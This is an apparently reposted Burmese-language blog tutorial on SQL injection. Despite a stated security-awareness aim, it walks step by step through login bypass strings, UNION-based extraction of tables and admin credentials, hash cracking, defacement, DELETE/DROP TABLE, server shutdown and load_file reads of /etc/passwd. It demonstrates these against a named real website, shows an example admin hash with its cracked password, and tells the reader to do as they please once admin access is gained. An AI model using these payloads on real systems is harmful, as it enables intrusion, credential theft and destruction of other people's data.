Showing posts with label IT. Show all posts
Showing posts with label IT. Show all posts

Saturday, July 28

SQL Injection သုိ႔မဟုတ္ Hacker ေတြရဲ႕ တုိက္ကြက္ဆန္းတစ္ခု

အရင္ဘေလာ့မွာနဲ႕ MMITD မွာ တင္ဖူးပါတယ္
ခု မသိသူေတြအတြက္ ထပ္မံတင္ေပးတာပါ


--- မိတ္ဆက္---

Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။

---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...

Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။

--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။

ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...

---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။

ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။

username:a or 1=1--
password:blank

SQL query မွာေတာ့

SELECT USER from database WHERE username='a' or 1=1-- AND password=''

ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။

SELECT USER from database WHERE username='a' or 1=1

1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...

username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1

--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။

---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5

id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..

www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based

www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a

String Based

www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...

အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။

www.site.com/article.php?id=5 union select 1--

In ASP ==>>
အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။

အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ

span class="tags">FORM action=Search/search.asp method=post>
span class="tags">input type=hidden name=A value=C>
span class="tags">/FORM>


ဒီ span class="tags">FORM>span class="tags">/FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။

span class="tags">FORM action=http://duck/Search/search.asp method=post>
span class="tags">input type=hidden name=A value='a' or 1=1--">
span class="tags">/FORM>


value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။


---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..

www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္

www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...

www.site.com/article.php?id=5 order by 3/*

အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...

ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္


http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..

http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..

ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...

http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး


7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္..

ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..

ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...

---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..

http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--

သုိ႔မဟုတ္

http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--

ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--

ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..

www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*

ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--

--MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--

ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--

ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..

ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927

John The Ripper
www.openwalls.org

Cain & Able
www.oxid.it

hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..

---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။


ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*

အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*

ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...

www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.

ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...


Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။

---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...

ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.

UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5

(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...

www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*

ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္

www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*

သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..

www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*

DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..

www.site.com/article.php?id=5 DELETE title,data,author FROM article/*

သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...

www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*

ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...

www.site.com/article.php?id=5 DROP TABLE article/*

ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...

SHUTTING DOWN MySQL SERVER:

www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;

LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....

www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*

အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)

ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..

* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..


---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက

hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*

ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com


---အသုံး၀င္တဲ႔ MySQL commands အခ်ိဳ႕ပါ..---

ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
